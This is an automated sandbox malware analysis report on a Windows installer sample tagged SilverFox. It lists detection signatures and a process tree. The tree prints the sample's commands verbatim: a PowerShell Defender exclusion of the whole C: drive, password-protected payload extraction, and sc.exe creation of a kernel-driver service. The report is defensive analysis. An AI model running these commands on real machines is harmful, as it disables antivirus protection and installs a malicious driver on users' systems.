Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
#U5b89#U88c5#U52a9#U624b1.0.2.exe

Overview

General Information

Sample name:#U5b89#U88c5#U52a9#U624b1.0.2.exe
renamed because original name is a hash value
Original sample name:1.0.2.exe
Analysis ID:1580228
MD5:315719354db8520278ae3d022b90da14
SHA1:46a92e47bdea70bef469eca470bb3b280f0fcd06
SHA256:e9d2969683bcc59dee33d048904b3bfb7af7b140ce360a326bb5bb9b3ef3b57e
Tags:exeSilverFoxwinosuser-kafan_shengui
Infos:

Detection

Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to hide a thread from the debugger
Found driver which could be used to inject code into processes
Hides threads from debuggers
Loading BitLocker PowerShell Module
Protects its processes via BreakOnTermination flag
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: New Kernel Driver Via SC.EXE
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • #U5b89#U88c5#U52a9#U624b1.0.2.exe (PID: 2640 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe" MD5: 315719354DB8520278AE3D022B90DA14)
    • #U5b89#U88c5#U52a9#U624b1.0.2.tmp (PID: 6112 cmdline: "C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp" /SL5="$1043E,5031707,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe" MD5: FFE4B45A6AE66BCB0FA01197725E2E27)
      • powershell.exe (PID: 5104 cmdline: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 4092 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • #U5b89#U88c5#U52a9#U624b1.0.2.exe (PID: 6932 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe" /VERYSILENT MD5: 315719354DB8520278AE3D022B90DA14)
        • #U5b89#U88c5#U52a9#U624b1.0.2.tmp (PID: 6768 cmdline: "C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp" /SL5="$100214,5031707,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe" /VERYSILENT MD5: FFE4B45A6AE66BCB0FA01197725E2E27)
          • 7zr.exe (PID: 4476 cmdline: 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 1880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • 7zr.exe (PID: 4852 cmdline: 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 2260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 4852 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • sc.exe (PID: 2640 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • conhost.exe (PID: 5472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2060 cmdline: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6016 cmdline: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6816 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2536 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2060 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1816 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4280 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1780 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5812 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1904 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2260 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3652 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Conhost.exe (PID: 1904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4408 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6320 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5460 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2536 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4280 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6120 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6828 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3468 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 984 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1880 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1360 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1720 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 928 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2364 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2060 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2640 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5800 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1904 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6832 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5012 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2060 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6120 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4856 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3744 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 928 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4852 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3652 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2060 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 396 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2120 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6548 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 980 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3052 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5868 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5684 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6832 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2944 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5960 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2180 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5012 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 984 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 396 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1780 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3060 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2080 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2668 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5868 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1904 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1816 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 396 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6320 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp" /SL5="$1043E,5031707,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp, ParentProcessId: 6112, ParentProcessName: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 5104, ProcessName: powershell.exe
Sigma detected: New Kernel Driver Via SC.EXE
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2060, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 6016, ProcessName: sc.exe
Sigma detected: Powershell Defender Exclusion
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp" /SL5="$1043E,5031707,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp, ParentProcessId: 6112, ParentProcessName: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 5104, ProcessName: powershell.exe
Sigma detected: New Service Creation Using Sc.EXE
Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2060, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 6016, ProcessName: sc.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp" /SL5="$1043E,5031707,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp, ParentProcessId: 6112, ParentProcessName: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 5104, ProcessName: powershell.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for dropped file
Source: C:\Program Files (x86)\Windows NT\hrsw.vbcVirustotal: Detection: 15%Perma Link
Multi AV Scanner detection for submitted file
Source: #U5b89#U88c5#U52a9#U624b1.0.2.exeVirustotal: Detection: 6%Perma Link
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 90.0% probability
Source: #U5b89#U88c5#U52a9#U624b1.0.2.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: #U5b89#U88c5#U52a9#U624b1.0.2.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000C.00000003.1804381617.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.1804284846.0000000003870000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C21AEC0 FindFirstFileA,FindClose,FindClose,6_2_6C21AEC0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_006B6868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,9_2_006B6868
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_006B7496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,9_2_006B7496
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000001.00000003.1771727709.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000001.00000003.1771727709.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000001.00000003.1771727709.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000001.00000003.1771727709.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000001.00000003.1771727709.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000001.00000003.1771727709.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000001.00000003.1771727709.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000001.00000003.1771727709.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000001.00000003.1771727709.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
